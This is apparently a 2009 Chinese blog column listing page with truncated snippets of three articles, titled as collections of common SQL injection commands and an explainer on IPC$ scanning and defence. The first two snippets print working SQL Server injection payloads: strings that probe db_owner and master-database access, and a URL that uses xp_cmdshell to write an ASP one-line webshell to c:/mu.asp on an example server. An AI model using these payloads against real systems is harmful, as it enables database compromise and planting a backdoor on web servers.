资源分享
关注
分享
扫一扫
文章平均质量分 75
浪潮M
想要告别天真 就要学习.
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
常用的注入命令
//看看是什么权限的and 1=(Select IS_MEMBER(db_owner))And char(124)%2BCast(IS_MEMBER(db_owner) as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS(master))And char(124)%2BCast(H原创 2009-06-19 16:35:00 · 413 阅读 · 0 评论 -
最详细的SQL注入相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell echo ^execute request^("l"^)^ >c:/mu.asp;-- ? echo ^ >c:/mu.asp2、 显示SQL系统版本: ? http:/原创 2009-06-19 16:37:00 · 963 阅读 · 0 评论 -
IPC$ 扫描和IPC$漏洞的防范
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。简单点说就是通过你的系统帐号和密码登陆你的系统的一个通道原创 2009-06-19 16:34:00 · 597 阅读 · 0 评论